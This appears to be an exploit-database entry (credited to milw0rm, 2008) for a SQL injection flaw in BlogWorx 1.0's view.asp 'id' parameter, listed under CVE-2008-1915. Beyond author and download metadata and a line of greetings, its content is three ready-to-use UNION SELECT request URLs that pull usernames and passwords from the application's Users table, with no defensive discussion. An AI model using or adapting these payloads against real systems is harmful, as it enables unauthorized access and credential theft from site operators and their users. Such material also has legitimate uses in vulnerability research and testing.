BlogWorx 1.0 - 'id' SQL Injection



EKU-ID: 13421 CVE: OSVDB-44531;CVE-2008-1915 OSVDB-ID:
Author: U238 Published: 2008-04-21 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


BlogWorx 'view.asp'  Multiple SQL Injection Vulnerability

Discovered By : U238

WebPage         : http://noexec.blogspot.com

mail                  : setuid.noexec0x1[a.q]hotmail[d0t].com


Script               : http://devworx.somee.com/projects/project.asp?pid=20

Script (alternativ)   : http://www.codedworld.com/download/blogworx/74764.html

Exploits   >>

http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,Password,UserName,5,6+from+Users
http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,Password,Password,5,6+from+Users
http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,UserName,Password,5,6+from+Users

: The_BekiR  - fahn - ka0x - xarnux - Ruslan - Tevfik Cevik - Ferruh Mavituna - nettoxic  - sersak :

# milw0rm.com [2008-04-21]